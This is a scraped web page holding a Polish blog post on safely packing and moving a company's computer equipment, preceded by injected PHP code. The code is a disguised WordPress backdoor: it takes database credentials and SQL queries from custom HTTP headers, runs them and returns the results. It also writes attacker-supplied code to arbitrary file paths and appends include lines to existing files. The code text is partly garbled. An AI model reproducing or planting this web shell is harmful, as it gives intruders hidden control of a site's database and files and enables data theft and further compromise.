n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Przeprowadzka firmy a sprzęt komputerowy

Przeprowadzka firmy a sprzęt komputerowy

Przeprowadzka firmy

Przeprowadzka firmy to ogrom prac związanych z przewożeniem dokumentów, wyposażenia, ale również takich rzeczy jak towar czy też maszyny i urządzenia. W przypadku tych ostatnich do problemów z przewiezieniem dochodzą jeszcze problemy z montażem i demontażem maszyn i urządzeń.

Przeprowadzka firmy to dość specyficzna przeprowadzka.

Aby udowodnić, że jest to sprawa bardzo ważna, warto spojrzeć na to, do czego wykorzystywane są komputery w domu a do czego wykorzystywane są w firmie. Komputer w firmie, bez względu na profil działalności,  jest potrzebny do codziennej pracy i z reguły zawiera szeregi dokumentów i informacji związanych z życiem firmy i wszystkim co z nią związane.

W pamięci komputera firmowego, nierzadko znajdują się rzeczy, które są nie do uratowania, jeśli ulegną wykasowaniu, zniszczeniu, uszkodzeniu, dlatego transport komputerów firmowych musi się odbyć bez uszkodzenia takich sprzętów. Sama strata komputera jest w tym momencie mało ważna – strata danych już krytycznie istotna. Idealnie jest również zgranie wszystkiego, co się znajduje w pamięci komputera, na zewnętrzną pamięć. Może to być pendrive, może zestaw płyt. Ważne jednak jest, że znajduje się kopia, tego, co było w komputerze.

Transport firmowego sprzętu komputerowego.

Transport firmowego sprzętu komputerowego, to rzecz do wykonania, jednak należy pamiętać, że to jest sprzęt komputerowy – z pozoru bardzo trudny do uszkodzenia, ale tylko z pozoru. Bardzo łatwo może ulec zniszczeniu nie tylko na skutek wypadku czy z uwagi na inny powód uszkodzenia ładunku. Komputer może się uszkodzić, przy gwałtownym wstrząsie podczas jazdy samochodem, ale może również ulec uszkodzeniu na skutek innych powodów. Zmiana wilgotności powietrza, mróz – wszystko to może spowodować nieprzewidziane sytuacje – komputer może nie chcieć się włączyć, co stanie się na pewno problemem.

Sprzęt komputerowy, który chcemy transportować, należy dokładnie zabezpieczyć. Idealnie jest, jeśli przewozi się go w oryginalnych opakowaniach, choć w większości przypadków jest to nierealne – nikt bowiem nie przechowuje takich kartonów zbyt długo, a z reguły wyrzuca po rozpakowaniu komputera. Jeśli nie ma oryginalnych opakowań, trzeba sobie poradzić inaczej. Do pakowania sprzętu komputerowego przyda się każdy karton, którego rozmiar pozwala na to, by schować w nim komputer czy tez urządzenia peryferyjne. Nie można jednak zapominać o jednym – istotne jest wypełnienie przestrzeni pustych. W każdym kartonie, luźno umiejscowiony sprzęt komputerowy, może się poruszać, a więc ryzyko jego usterki znacznie rośnie. Z tego miedzy innymi powodu, warto używać wypełniaczy do takich przestrzeni. Oczywiście nie mogą to być wypełniacze typu styropian. Potrzebne są inne – pełne. Wszelkiego rodzaju rzeczy stałe, gazety i wiele innych.

Przeprowadzka firmy

Podsumowując.

Działając odpowiednio, bez problemu można przewieźć sprzęt komputerowy na nowe miejsce. Oczywiście należy pamiętać o tym, że środki ostrożności, nie są sprawami bez znaczenia. Działając odpowiednio i ostrożnie, uda się z pewnością dotrzeć ze sprzętem komputerowym tam, gdzie potrzeba i dowieźć go w całości.

Leave a Reply